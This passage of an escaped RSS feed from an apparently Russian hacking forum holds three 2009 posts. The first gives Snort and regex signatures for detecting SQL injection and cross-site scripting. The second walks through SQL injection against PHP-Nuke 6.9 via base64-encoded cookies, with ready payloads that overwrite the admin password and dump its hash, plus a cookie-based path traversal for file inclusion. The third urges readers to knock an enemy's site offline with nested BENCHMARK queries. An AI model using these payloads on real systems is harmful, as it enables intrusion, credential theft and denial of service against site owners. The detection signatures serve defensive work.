Injection - Paranoid&amp;quot;;&lt;br /&gt;flow:to_server,established;uricontent:&amp;quot;.pl&amp;quot;;pcre:&amp;quot;/(\%27)|(\&#039;)|(\-\-)|(%23)|(#)/i&amp;quot;;&lt;br /&gt;classtype:Web-application-attack; sid:9099; rev:5;) &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В нашем случае, ключевое слово uricontent имеет значение &amp;quot;.pl&amp;quot;, т.к. в среде, в которой мы проводим наши испытания, CGI сценарии написаны на Perl. В зависимости от вашего приложения это значение может быть &amp;quot;.php&amp;quot;, или &amp;quot;.asp&amp;quot;, или &amp;quot;.jsp&amp;quot;, и т.д.&lt;br /&gt;С помощью описанного выше выражения мы обнаруживаем присутствие двойного тире, т.к. бывают ситуации, когда SQL инъекция возможна даже без применения одинарной кавычки [6]. Примером может служить SQL запрос с предложением where, содержащим только числовые значения:&lt;/p&gt;
						&lt;p&gt;select value1, value2, num_value3 from database&lt;br /&gt;where num_value3=some_user_supplied_number&lt;br /&gt;В этом случае, злоумышленник может выполнить дополнительный SQL запрос, выполнив ввод следующего выражения:&lt;br /&gt;3; insert values into some_other_table&lt;br /&gt;И наконец, pcre модификаторы &#039;i&#039; и &#039;x&#039; используются, соответственно, для игнорирования регистра символов и пробелов(или знаков табуляции).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Описанная выше сигнатура может быть дополнена для обнаружения знака &amp;quot;точка с запятой&amp;quot;. Однако точка с запятой может вполне нормально быть частью HTTP трафика. Для уменьшения вероятности неправильной идентификации, такая сигнатура может быть модифицирована, чтобы сперва обнаруживать символ &amp;quot;=&amp;quot;. Ввод данных пользователем обычно происходит как POST или GET запрос, в котором входные поля будут выглядеть следующим образом:&lt;br /&gt;username=some_user_supplied_value&amp;amp;password=some_user_supplied_value&lt;br /&gt;Поэтому при попытке SQL инъекции, данным пользователя предшествовал бы знак = или его шестнадцатеричный эквивалент.&lt;/p&gt;
						&lt;p&gt;2.2 Модифицированные регулярные выражения для обнаружения SQL метасимволов.&lt;br /&gt;/((\%3D)|(=))[^\n]*((\%27)|(\&#039;)|(\-\-)|(\%3B)|(;))/i &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;br /&gt;Пояснения:&lt;br /&gt;&amp;#160; &amp;#160; Такая сигнатура сначала находит символ &amp;quot;=&amp;quot; или его шестнадцатеричный эквивалент (%3D). После этого, игнорируя разделители строк и пробелы, производиться поиск вхождений одинарной кавычки, двойного&amp;#160; тире или точки с запятой.&lt;br /&gt;Обычно попытки SQL инъекций сводятся к использованию одинарной кавычки для управления первоначальным запросом. В большинстве примеров, приводимых в статьях посвященных этому типу нападений, используется строка 1&#039;or &#039;1&#039; = &#039;1. Однако от обнаружения этой строки можно легко уклониться, использую значение типа 1&#039;or2&amp;gt; 1--. Таким образом, единственной постоянной частью таких выражений остается символьное значение, сопровождаемое одинарной кавычкой, с последующим за ней словом &amp;quot;or&amp;quot;.&lt;/p&gt;
						&lt;p&gt;2.3 Регулярное выражение для типичных SQL инъекций&lt;/p&gt;
						&lt;p&gt;/\w*((\%27)|(\&#039;))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;br /&gt;Пояснения:&lt;br /&gt;\w* - ноль или другие алфавитно-цифровые символы или символы подчеркивания&lt;br /&gt;(\ %27) | \ &#039; - одинарная кавычка или её шестнадцатеричный эквивалент&lt;br /&gt;(\ %6F) |o | (\ % 4F)) ((\ %72) |r | (\ % 52) - слово &#039;or&#039; в различных комбинациях верхнего и нижнего регистров и их шестнадцатеричные эквиваленты.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Часто, проведение SQL инъекций при атаках на различные базы данных сопровождается&amp;#160; использованием ключевого слова &amp;quot;union&amp;quot;. При использовании описанных ранее регулярных выражений мы можем лишь определить наличие одинарной кавычки или других метасимволов SQL. Но далее мы будем модифицировать наши регулярные выражения для определения одинарной кавычки и ключевого слова &amp;quot;union&amp;quot;. То же самое можно сделать и для других ключевых слов SQL типа &#039;select&#039;, &#039;insert&#039;, &#039;update&#039;, &#039;delete&#039; и т.д.&lt;/p&gt;
						&lt;p&gt;2.4 Регулярное выражения для определения SQL инъекции с использованием ключевого слова “union”.&lt;/p&gt;
						&lt;p&gt;/((\%27)|(\&#039;))union/ix&lt;br /&gt;(\%27)|(\&#039;) – одинарная кавычка и её шестнадцатеричный эквивалент&lt;br /&gt;union – ключевое слово «union»&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Подобные выражения могут быть написаны и для других SQL запросов типа &amp;gt; select, insert, update, delete, drop и т.д.&lt;br /&gt;В случае если хакер обнаружил, что WEB приложение уязвимо к SQL инъекции, он начнет эксплуатировать эту уязвимость. Если нужная база данных храниться на MS SQL сервере, то хакер, скорее всего, попробует выполнить одну их многих опасных сохраненных или расширенных сохраненных процедур. Названия таких процедур начинаются, соответственно, с &#039;sp&#039; или &#039;xp&#039;. Как правило, он попытался бы выполнить расширенную процедуру &#039;xp_cmdshell&#039;, позволяющую выполнять через SQL сервер команды оболочки Windows. Права доступа с которыми выполниться эта процедура будут такие же как и у учетной записи с которой запущен SQL сервер (обычно Local System). Дополнительно, злоумышленник попытается внести изменения в реестр с помощью использования процедур xp_regread, xp_regwrite, и т.д.&lt;/p&gt;
						&lt;p&gt;2.5 Регулярное выражение для определения SQL инъекции на MS SQL сервере.&lt;/p&gt;
						&lt;p&gt;/exec(\s|\+)+(s|x)p\w+/ix &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;br /&gt;Пояснения:&lt;br /&gt;exec – ключевое слово необходимое для запуска сохраненной или расширенной процедуры&lt;br /&gt;(\s|\+)+ - один или несколько пробелов или их эквиваленты закодированные HTTP&lt;br /&gt;(s|x)p – символы &#039;sp&#039; или &#039;xp&#039; необходимые для идентификации сохраненной или расширенной процедуры, соответственно&lt;br /&gt;\w+ - один или несколько алфавитно-цифровых символов или символов подчеркивания, необходимых для завершения написания имени процедуры.&lt;/p&gt;
						&lt;p&gt;3. Регулярные выражения для определения атак межсайтового скриптинга (CSS атак)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; При выполнении CSS атаки или при испытании сайта на уязвимость к таким атакам, хакер для начала может создать простой форматирующий HTML тэг типа &amp;lt;b&amp;gt; для полужирного, &amp;lt;i&amp;gt; для курсива или &amp;lt;u&amp;gt; для подчеркивания. Также можно использовать тривиальный тэг сценария типа &amp;lt;script&amp;gt;alert(&amp;quot;OK&amp;quot;)&amp;lt;/script&amp;gt;. Такие сценарии описаны в большинстве руководств как самые простые примеры определения уязвимости сайта к CSS атакам. Такие попытки можно очень легко обнаружить. Однако более продвинутый хакер может маскировать такие строки введя их шестнадцатеричные эквиваленты.&amp;#160; Так, к примеру, тэг &amp;lt;script&amp;gt; был бы представлен в виде %3C%73%63%72%69%70%74%3E. С другой стороны злоумышленник может использовать программы типа Achilles и изменять автоматическое преобразование браузером специальных символов типа &amp;lt; to %3C and &amp;gt; в&amp;#160; %3E.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ниже представлено регулярное выражение, определяющее атаки, содержащие открывающие и закрывающие HTML тэги &amp;lt;&amp;gt; с любым текстом внутри. Такое выражение будет отлавливать попытки использования &amp;lt;b&amp;gt;, &amp;lt;u&amp;gt; или &amp;lt;script&amp;gt;. Также мы должны будем проверить наличие угловых скобок и их шестнадцатеричных эквивалентов или (%3C|&amp;lt;). Для обнаружения шестнадцатеричных эквивалентов, необходимо определить наличие в строке чисел и символов %, другими словами использование [a-z0-9 %]. При таком подходе возможна неправильная идентификация, но в большинстве случаев атака будет обнаружена.&lt;/p&gt;
						&lt;p&gt;3.1 Регулярное выражение для примитивной CSS атаки&lt;/p&gt;
						&lt;p&gt;/((\%3C)|&amp;lt;)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|&amp;gt;)/ix &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;br /&gt;Пояснения:&lt;br /&gt;((\%3C)|&amp;lt;) – проверяет наличие открывающейся угловой скобки и её шестнадцатеричного эквивалента&lt;br /&gt;((\%2F)|\/)* - слеш для закрывающего тэга, а также его шестнадцатеричный эквивалент&lt;br /&gt;[a-z0-9\%]+ - проверяет наличие символьно-цифровой строки внутри тэга или её шестнадцатеричное представление&lt;br /&gt;((\%3E)|&amp;gt;) - проверяет наличие закрывающейся угловой скобки или её шестнадцатеричного эквивалента&lt;br /&gt;Snort сигнатура&lt;br /&gt;alert tcp $EXTERNAL_NET any -&amp;gt; $HTTP_SERVERS $HTTP_PORTS&lt;br /&gt;(msg:&amp;quot;NII Cross-site scripting attempt&amp;quot;; flow:to_server,established; pcre:&amp;quot;/((\%3C)|&amp;lt;)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|&amp;gt;)/i&amp;quot;;&lt;br /&gt;classtype:Web-application-attack; sid:9000; rev:5;) &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;br /&gt;Существует еще один способ выполнения CSS атаки - использование &amp;lt;img src =&amp;gt; методики. Заданную по умолчанию сигнатуру Snort можно легко обойти. Сигнатуру, представленную в пункте 3.2 обойти будет гораздо сложнее.&lt;/p&gt;
						&lt;p&gt;3.2 Регулярное выражение для определение CSS атаки с помощью&lt;/p&gt;
						&lt;p&gt;&amp;quot;&amp;lt;img src&amp;quot; /((\%3C)|&amp;lt;)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|&amp;gt;)/I &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;br /&gt;Пояснения:&lt;br /&gt;(\%3C)|&amp;lt;) - открывающаяся угловая скобка или её шестнадцатеричный эквивалент&lt;br /&gt;(\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47) - слово &#039;img&#039; в различных комбинациях ASCII, или верхнего и нижнего регистров в шестнадцатеричном эквиваленте&lt;br /&gt;[^\n]+ любой символ отличный от символа новой строки, следующий за &amp;lt;img&lt;br /&gt;(\%3E)|&amp;gt;) закрывающаяся угловая скобка или её шестнадцатеричный эквивалент.&lt;/p&gt;
						&lt;p&gt;3.3 Параноидальное выражения для определения CSS атак.&lt;br /&gt;/((\%3C)|&amp;lt;)[^\n]+((\%3E)|&amp;gt;)/I &amp;lt;/TD&amp;lt; tr&amp;gt;&lt;br /&gt;Пояснения:&lt;br /&gt;Такая сигнатура ищет открывающийся HTML тэг и его шестнадцатеричный эквивалент с последующими за ним символами, отличными от символа новой строки, а затем сопровождаемый закрывающейся угловой скобкой или её шестнадцатеричным эквивалентом. В зависимости от конфигурации вашего Web приложения, такое условие может привести к неправильной идентификации выражений, но зато гарантирует определение любого, что хотя бы отдаленно напоминает CSS атаку.&lt;/p&gt;
						&lt;p&gt;4. Заключение&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В этой статье были представлены различные типы регулярных выражений, используемых для обнаружения SQL инъекций и CSS атак. Некоторые из таких выражений просто параноидальны и выдают предупреждения даже при намеках на атаку. Но существует вероятность, что использование таких сигнатур приведет к неправильной идентификации выражений. Для предупреждения этого, мы изменили тривиальные сигнатуры, снабдив их дополнительными проверками и сделав более точными. Мы рекомендуем использовать эти регулярные выражения в качестве отправной точки при настройке вашей системы обнаружения вторжений.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:33:37 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=18#p18</guid>
		</item>
		<item>
			<title>SQL-injection и не только, через cookies</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;---/ Введение /---&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В данной статье я хотел бы рассказать об одной интересной (по крайней мере для меня) уязвимости. Описания подобной уязвимости я еще не встречал в сети, поэтому думаю для вас это будет новой информацией, а уж если не новой то хотя бы интересной =) Наиболее характерна бага для всевозможных движков сайтов, форумов и прочего, поддерживающих вход с использованием cookies. В сети я встречал статьи посвященные методам атаки через cookies, но в них рассматривалась атака на пользователя со стороны сервера, а вот описания метода атаки на сервер со стороны клиента я не встречал. Чтож наверно пора это исправить =)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В начале статьи следует заметить, что для наиболее полного понимания сути проблемы вы должны обладать некоторыми (элементарными) знаниями в некоторых областях т.к. подробно останавливаться я на них не буду, а без их знания некоторые примеры могут показаться вам непонятными. Итак желательны: основы sql injection , язык SQL , язык PHP , основы работы с cookies , основы Base64 encode\decode ну и конечно немного желания....&lt;/p&gt;
						&lt;p&gt;---/ Теория /---&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Авторами всевозможных движков на пхп для построения сайта уделяется достаточно внимания к безопасности при приеме данных от пользователя в GET, POST запросах (правда не всегда и не всеми =) однако что-то я не часто встречал проверок при приеме данных из кук пользователя, а ведь куки хранятся на компьютере юзера и наиболее доступны для изменения. Предлагаю рассмотреть все на конкретном примере. Берем движок PHP-Nuke версии 6.9 (последняя версия доступная для свободного скачивания) Данный движок написан уже давно, багов в нем нашли немеряно и казалось бы авторы должны были стать параноиками и навставлять проверок везде где это только возможно, ан нет... Рассмотрим код из файла auth.php ответственного за авторизацию пользователя:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[ begin code ]&lt;br /&gt;...&lt;br /&gt;if(isset($admin) &amp;amp;&amp;amp; $admin != &amp;quot;&amp;quot;) # если переменная $admin существует и не пуста&lt;br /&gt;{&lt;br /&gt;$admin = base64_decode($admin); # base64 декодирование строки&lt;br /&gt;$admin = explode(&amp;quot;:&amp;quot;, $admin); # разбиение строки&lt;br /&gt;$aid = &amp;quot;$admin[0]&amp;quot;; # тут присвоение полученных данных переменной $aid (логин)&lt;br /&gt;$pwd = &amp;quot;$admin[1]&amp;quot;; # тут присвоение полученных данных переменной $pwd (пароль)&lt;br /&gt;$admlanguage = &amp;quot;$admin[2]&amp;quot;;&lt;/p&gt;
						&lt;p&gt;[ тут идет проверка на пустые логин и пароль, она не интересна ]&lt;/p&gt;
						&lt;p&gt;$sql = &amp;quot;SELECT pwd FROM &amp;quot;.$prefix.&amp;quot;_authors WHERE aid=&#039;$aid&#039;&amp;quot;; # а вот тут уже запрос к БД включающий&lt;br /&gt;# в себя переменную $aid полученную ранее&lt;/p&gt;
						&lt;p&gt;if (!($result = $db-&amp;gt;sql_query($sql))) # если запрос не увенчался успехом&lt;br /&gt;{&lt;br /&gt;echo &amp;quot;Selection from database failed!&amp;quot;; # вывод сообщения (это нам пригодится позднее)&lt;br /&gt;exit;&lt;br /&gt;}&lt;br /&gt;else # если запрос вернул инфу&lt;br /&gt;{&lt;br /&gt;$row = $db-&amp;gt;sql_fetchrow($result); # получение ответа&lt;br /&gt;if($row[pwd] == $pwd &amp;amp;&amp;amp; $row[pwd] != &amp;quot;&amp;quot;) # проверка данных&lt;br /&gt;{&lt;br /&gt;$admintest = 1; # баааа... да это админ =)))&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;}&lt;br /&gt;...&lt;br /&gt;[ end code ]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt; Как видно из приведенного листинга то после получения переменной $aid из кук она без всяких проверок отправляется в sql-запрос, а это означает что мы с чистой совестью можем изменить данную переменную и изменить сам запрос к БД. Теперь стоит разобраться с куками которые сбрасывает данный движок. Я рекомендую поставить php-nuke себе и на своем компе производить все операции дабы разобраться в том что происходит. Значит после установки движка регистрируем в нем пользователя &amp;quot;admin&amp;quot; с паролем &amp;quot;password&amp;quot; и лезем смотреть на куки которые у нас сбросились.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[ start cookie ]&lt;br /&gt;lang&lt;br /&gt;english&lt;br /&gt;127.0.0.1/phpnuke/&lt;br /&gt;1536&lt;br /&gt;1008201472&lt;br /&gt;29680718&lt;br /&gt;3288127568&lt;br /&gt;29607292&lt;br /&gt;*&lt;br /&gt;admin&lt;br /&gt;YWRtaW46NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk6&lt;br /&gt;127.0.0.1/phpnuke/&lt;br /&gt;1536&lt;br /&gt;3469246208&lt;br /&gt;29613327&lt;br /&gt;3600307568&lt;br /&gt;29607292&lt;br /&gt;*&lt;br /&gt;[ end cookie ]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;аиболее интересна для нас строка YWRtaW46NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk6 это зашифрованные&lt;br /&gt;base64 логин и md5 хеш пароля юзера. Самое время их расшифровать и посмотреть как там все устроено.&lt;br /&gt;base64 расшифровывается очень легко поэтому особых трудностей тут возникнуть не должно:&lt;/p&gt;
						&lt;p&gt;зашифровано:&lt;br /&gt;YWRtaW46NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk6&lt;/p&gt;
						&lt;p&gt;расшифровано:&lt;br /&gt;admin:5f4dcc3b5aa765d61d8327deb882cf99:&lt;/p&gt;
						&lt;p&gt;Где,&lt;br /&gt;admin - логин&lt;br /&gt;5f4dcc3b5aa765d61d8327deb882cf99 - md5 хеш пароля ( в данном случае &amp;quot;password&amp;quot;)&lt;br /&gt;: - разделитель&lt;/p&gt;
						&lt;p&gt;---/ Изменение данных в cookie /---&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Итак у нас в руках есть логин и md5 хэш. Давайте попробуем изменить логин и соответственно мы изменим последующий sql-запрос к БД:&lt;/p&gt;
						&lt;p&gt;измененная строка:&lt;br /&gt;admin&#039;:5f4dcc3b5aa765d61d8327deb882cf99:&lt;/p&gt;
						&lt;p&gt;шифруем в base64:&lt;br /&gt;YWRtaW4nOjVmNGRjYzNiNWFhNzY1ZDYxZDgzMjdkZWI4ODJjZjk5Og==&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Как вы видите мы добавили &amp;quot;&#039;&amp;quot; к логину. Если вы не знаете что это такое то читайте статьи про sql injection. Теперь осталось вставить измененную строку в наш кук и посмотреть, что произойдет. Открываем в браузере наш движок и пытаемся войти в админ-панель.&lt;br /&gt;Получаем: Selection from database failed!&lt;br /&gt;Ура. Значит sql-запрос был благополучно изменен =)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Теперь посмотрим что происходит в БД. Открываем логи и видим:&lt;/p&gt;
						&lt;p&gt;1 Init DB nuke&lt;br /&gt;1 Init DB nuke&lt;br /&gt;1 Query SELECT main_module from nuke_main&lt;br /&gt;1 Query SELECT * FROM nuke_referer&lt;br /&gt;1 Query SELECT user_password FROM nuke_users WHERE username=&#039;&#039;&lt;br /&gt;1 Query DELETE FROM nuke_session WHERE time &amp;lt; 1071760481&lt;br /&gt;1 Query SELECT time FROM nuke_session WHERE uname=&#039;127.0.0.1&#039;&lt;br /&gt;1 Query SELECT * FROM nuke_banner WHERE type=&#039;0&#039; AND active=&#039;1&#039;&lt;br /&gt;1 Query SELECT bid, imageurl, clickurl, alttext FROM nuke_banner WHERE type=&#039;0&#039; AND active=&#039;1&#039; LIMIT 0,1&lt;br /&gt;1 Query SELECT pwd FROM nuke_authors WHERE aid=&#039;admin&#039;&#039; &amp;lt;--- !!!!!!!!&lt;br /&gt;...&lt;br /&gt;&amp;#160; &amp;#160; Вот оно! Как видно наш логин благополучно пробрался в запрос и соответственно данный запрос не смог возвратить пароль пользователя из-за чего мы и получаем надпись...&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;if (!($result = $db-&amp;gt;sql_query($sql))) # если запрос не увенчался успехом&lt;br /&gt;{&lt;br /&gt;echo &amp;quot;Selection from database failed!&amp;quot;; &amp;lt;--- вот эта надпись&lt;br /&gt;exit;&lt;br /&gt;}&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Итак. SQL-injection налицо, осталось выяснить, что это нам дает.... Тут следует обратится к документации по языку sql, и всевозможной инфе по sql-injection. Я особо углублятся в это не буду. Рассмотрю лишь небольшой пример...&lt;/p&gt;
						&lt;p&gt;---/ Примеры /---&lt;/p&gt;
						&lt;p&gt;Шифруем строку:&lt;br /&gt;admin&#039;; update nuke_authors SET pwd=&#039;123&#039; WHERE aid=&#039;admin:5f4dcc3b5aa765d61d8327deb882cf99:&lt;/p&gt;
						&lt;p&gt;Получаем:&lt;br /&gt;YWRtaW4nOyB1cGRhdGUgbnVrZV9hdXRob3JzIFNFVCBwd2Q9JzEyMycgV0hFUkUgYWlkPSdhZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OTo= &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; После вставки данной строки в cookie и захода на сайт в БД выполняется запрос:&lt;br /&gt;SELECT pwd FROM nuke_authors WHERE aid=&#039;admin&#039;; update nuke_authors SET pwd=&#039;123&#039; WHERE aid=&#039;admin&#039;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Т.е. если phpnuke стоит на MSSQL то хеш пароля юзера с aid=&amp;quot;admin&amp;quot; сменится на &amp;quot;123&amp;quot; =)&lt;br /&gt;Почему MSSQL? Просто эта БД позволяет отдавать несколько запросов в одной строке разделяя их &amp;quot;;&amp;quot; В случае с mysql данная фишка не прокатит т.к. там такая роскошь не допускается =( Конечно можно поиграть с UNION но это подходит только для mysql &amp;gt; 4.0 т.к. в более ранних данной команды нет. Да и в случае с phpnuke никаких результатов это нам не даст т.к. тут нету вывода какой-либо инфы из базы в процессе авторизации =( Возможно в каких-либо других движках при другом виде запросов к БД и удастся приспособить UNION для получения инфы... Но это тема другой статьи.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ну и как дополнение к статье рассмотрим путь получения хеша пароля для юзера с id=&amp;quot;admin&amp;quot; в php-nuke версии 6.9 на mysql&lt;/p&gt;
						&lt;p&gt;Шифруем строку:&lt;br /&gt;admin&#039; INTO OUTFILE &#039;./pwd.txt:5f4dcc3b5aa765d61d8327deb882cf99:&lt;/p&gt;
						&lt;p&gt;Получаем:&lt;br /&gt;YWRtaW4nIElOVE8gT1VURklMRSAnLi9wd2QudHh0OjVmNGRjYzNiNWFhNzY1ZDYxZDgzMjdkZWI4ODJjZjk5Og== &lt;/p&gt;
						&lt;p&gt;После вставки полученной строки в cookie и захода на сайт выполняется запрос:&lt;br /&gt;SELECT pwd FROM nuke_authors WHERE aid=&#039;admin&#039; INTO OUTFILE &#039;./pwd.txt&#039;&lt;/p&gt;
						&lt;p&gt;Т.е. выбор хеша пароля из БД соответствующего aid=&amp;quot;admin&amp;quot; и сохранение этого хеша в файле pwd.txt.&lt;/p&gt;
						&lt;p&gt;---/ Хинт для нюка /---&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Если посмотреть на php-код приведенный в самом начале статьи то можно заметить что на PHP-Nuke совсем не обязательно передавать данные именно через cookies. Можно передавать зашифрованную строку прямо через браузер следующим образом:&lt;br /&gt;admin.php?admin=YWRtaW4nOjVmNGRjYzNiNWFhNzY1ZDYxZDgzMjdkZWI4ODJjZjk5Og==&lt;br /&gt;Результат будет таким-же как и при передаче через кукисы.&lt;/p&gt;
						&lt;p&gt;---/ SQL-injection и только? /---&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Естественно не следует думать, что модификация данных в cookies может привести только к SQL-injection. Модификация данных в cookies лишь метод, а вот направление использования этого метода уже зависит от кода уязвимого ПО. Мне кажется лучше всего будет это продемонстрировать на примере все того-же бедного пхп-нюка =) версии 6.9. ( К слову сказать на момент когда статья была дописана я уже достал себе версию нюки 7.0 FINAL и все приведенные примеры в ней также работают) Итак мы уже в курсе про куки в которых хранится логин и пароль, но ведь движок сбрасывает еще одну куку... а именно кукис с названием языка который следует использовать. И название данного файла хранится в переменной $lang и используется вот таким образом:&lt;/p&gt;
						&lt;p&gt;[ begin mainfile.php code ]&lt;/p&gt;
						&lt;p&gt;... include(&amp;quot;language/lang-$lang.php&amp;quot;);&lt;/p&gt;
						&lt;p&gt;... [ end mainfile.php code ]&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Конечно данную переменную можно сменить и просто отдав с строке браузера нужный запрос, например вот так: 127.0.0.1/phpnuke/index.php?lang=/../../../ но использовать для этого кукисы будет более правильно, хотя наверно это не самый лучший пример, но какой есть. Простопредставим что данные из GET запросов фильтруются на наличие в запросе... ну например точек. Значит изменение пути через браузер отпадает. Будем играть с куками. Значит нам надо изменить путь к языковому файлу. Открываем сайт, получаем куки и смотрим:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[ start cookie ]&lt;br /&gt;...&lt;br /&gt;lang&lt;br /&gt;english&lt;br /&gt;...&lt;br /&gt;[ end cookie ]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вот тут нас интересует &amp;quot;english&amp;quot; при таком значении переменной языковой файл будет такой: language/lang-english.php&lt;br /&gt;Мы изменяем в кукисах вот на такую строку: ../../english&lt;br /&gt;Заходим на сайт и получаем ошибку:&lt;/p&gt;
						&lt;p&gt;Warning: main(language/lang-../../english.php): failed to open stream:&lt;br /&gt;No such file or directory in mainfile.php on line 162&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Итак мы можем изменить путь к файлу. Допустим у нас есть возможность залить файл на сервер или же у нас есть свой сайт, физически расположенный там-же где и атакуемый. Значит мы можем проинклудить свой созданный заранее файлик. Я рассмотрю пример с инклудом из корня пхп-нюки:&lt;br /&gt;Делаем в куке:&lt;br /&gt;lang&lt;br /&gt;/../../hacker&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Теперь путь к файлу такой:&lt;br /&gt;language/lang-/../../hacker.php&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Создаем в корне нюки файл hacker.php например с &lt;br /&gt;Заходим с измененным cookie на сайт и в самом верху получаем надпись &amp;quot;cool =)&amp;quot;&lt;br /&gt;Код выполнился, а значит потенциальная уязвимость существует.&lt;/p&gt;
						&lt;p&gt;---/ Защита /---&lt;/p&gt;
						&lt;p&gt;Способ защиты в принципе банален и не нов. Просто фильтровать ВСЕ!!! пришедшие от пользователя данные, независимо от того каким способом они передаются.&lt;/p&gt;
						&lt;p&gt;---/ Заключение /---&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В данной статье рассмотрена лишь суть проблемы, а методы использования уже предстоит придумать и реализовать вам самим. Также метод рассмотренный тут не является шаблоном по которому можно ломануть все и вся... Все зависит от самого скрипта использующегося на сервере, от вида запросов к БД, от способов получения данных из cookies и т.д. Да и еще... самое главное! Статья написана в помощь администраторам и авторам всевозможных пхп-скриптов, с целью указать на их возможные ошибки. Не используйте информацию из этой статьи в целях противоречащих УК.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:32:34 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>SQL Injection+DoS</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=16#p16</link>
			<description>&lt;p&gt;Данная статья описыват как можно DoS-ить если на сайте возможна SQL Injection.&lt;/p&gt;
						&lt;p&gt;ПРЕДИСЛОВИЕ&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Часто бывает так что мы находим SQL Injection на каком либо сайте. Но по разным причинам не можем найти имена таблиц и полей. Вот тогда нам всем хочется хоть как то отомстить админам сайта.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Второй вариант. У вас есть враг у кого есть сайт. На этом сайте вы нашли уязвимость SQL Injection. Но вы думаете что просто украсть пароли будет слишком мало. Вот тогда и к нам на помощь приходит DoS.&lt;/p&gt;
						&lt;p&gt;АТАКА&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Итак мы имеем уязвимый сайт. wwwexample.com. Пусть нефильтруемая переменная там id. Тоесть у нас проходят запросы типа wwwexample.com/index.php?id=-1+union+select+null,null,null,version(),null.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; И мы хотим по одной (или может сразу двух) из причин задосить сайт.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В SQL есть такая функция benchmark. Она используется для того чтобы вычислить заданное выражение заданное количество раз. Так например запрос типа BENCHMARK(10000, now()) означает ВЫПОЛНИТЬ now() 10000 раз. (now() возвращяет текущую дату в формате ГГГГ-ММ-ДД ЧЧ:ММ:СС). Такой запрос не сможет с легкостью проглотить даже мощный сервер. Не говоря уж и о средненьких. Также можно использовать вот каким образом BENCHMARK(100000, BENCHMARK(10000, NOW())). Ну это вы и сами поймете :) Напоследок: запрос как вы уже и сами поняли будет выглядить следующим образом&lt;br /&gt;&lt;a href=&quot;http://www.example.com/index.php?id=1+BENCHMARK&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.example.com/index.php?id=1+BENCHMARK&lt;/a&gt;(100000, BENCHMARK(10000, NOW())). Чем больше количество нулей тем дольше будет длится DoS.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Может возникнуть вопрос: почему досить средствами SQL Injection, а не просто скачать программу итп? Ответ: DoS как таковой не всегда возможен. Сервер могут пропатчить.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Thu, 18 Jun 2009 01:14:39 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=16#p16</guid>
